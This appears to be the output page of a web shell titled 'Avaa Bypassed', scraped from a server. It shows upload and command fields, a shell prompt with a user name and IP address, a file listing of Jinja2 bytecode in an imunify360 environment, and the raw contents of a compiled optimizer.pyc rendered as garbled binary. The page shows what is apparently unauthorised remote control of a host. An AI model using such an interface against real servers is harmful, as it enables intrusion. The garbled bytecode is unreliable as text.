[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.135.193.70: ~ $
�

5�Dg���D�dZddlmZddlmZd�ZGd�de��ZdS)a�The optimizer tries to constant fold expressions and modify the AST
in place so that it should be faster to evaluate.

Because the AST does not contain all the scoping information and the
compiler has to find that out, we cannot do all the optimizations we
want. For example, loop unrolling doesn't work because unrolled loops
would have a different scope. The solution would be a second syntax tree
that stored the scoping rules.
�)�nodes)�NodeTransformerc�J�t|��}|�|��S)z^The context hint can be used to perform an static optimization
    based on the context given.)�	Optimizer�visit)�node�environment�	optimizers   �p/builddir/build/BUILD/imunify360-venv-2.4.0/opt/imunify360/venv/lib/python3.11/site-packages/jinja2/optimizer.py�optimizers#���+�&�&�I��?�?�4� � � �c�$��eZdZd�Z�fd�Z�xZS)rc��||_dS)N)r	)�selfr	s  r�__init__zOptimizer.__init__s��&����r
c�B��tt|��j|g|�Ri|��}t|tj��r_	tj�|�|r|dnd��|j	|j
���S#tj$rYnwxYw|S)N�)�linenor	)�superr�
generic_visit�
isinstancer�Expr�Const�from_untrusted�as_constrr	�
Impossible)rr�args�kwargs�	__class__s    �rrzOptimizer.generic_visits����3�u�Y��%�%�3�D�J�4�J�J�J�6�J�J���d�E�J�'�'�	�
��{�1�1��M�M�T�";�$�q�'�'�t�<�<��;� $� 0�2�����
�#�
�
�
���
�����s�AB
�
B�B)�__name__�
__module__�__qualname__rr�
__classcell__)rs@rrrsG�������'�'�'���������r
rN)�__doc__�r�visitorrrr�r
r�<module>r(sx����������$�$�$�$�$�$�!�!�!�����������r

Filemanager

Name Type Size Permission Actions
__init__.cpython-311.pyc File 2.38 KB 0644
_compat.cpython-311.pyc File 6.11 KB 0644
_identifier.cpython-311.pyc File 1.94 KB 0644
asyncfilters.cpython-311.pyc File 8.3 KB 0644
asyncsupport.cpython-311.pyc File 14.05 KB 0644
bccache.cpython-311.pyc File 17.3 KB 0644
compiler.cpython-311.pyc File 94.95 KB 0644
constants.cpython-311.pyc File 1.55 KB 0644
debug.cpython-311.pyc File 8.57 KB 0644
defaults.cpython-311.pyc File 1.33 KB 0644
environment.cpython-311.pyc File 59.93 KB 0644
exceptions.cpython-311.pyc File 8.29 KB 0644
ext.cpython-311.pyc File 33.73 KB 0644
filters.cpython-311.pyc File 53.57 KB 0644
idtracking.cpython-311.pyc File 16.06 KB 0644
lexer.cpython-311.pyc File 32.9 KB 0644
loaders.cpython-311.pyc File 24.33 KB 0644
meta.cpython-311.pyc File 5 KB 0644
nativetypes.cpython-311.pyc File 5.59 KB 0644
nodes.cpython-311.pyc File 52.61 KB 0644
optimizer.cpython-311.pyc File 2.34 KB 0644
parser.cpython-311.pyc File 52.05 KB 0644
runtime.cpython-311.pyc File 40.07 KB 0644
sandbox.cpython-311.pyc File 20.02 KB 0644
tests.cpython-311.pyc File 7.23 KB 0644
utils.cpython-311.pyc File 33.01 KB 0644
visitor.cpython-311.pyc File 4.5 KB 0644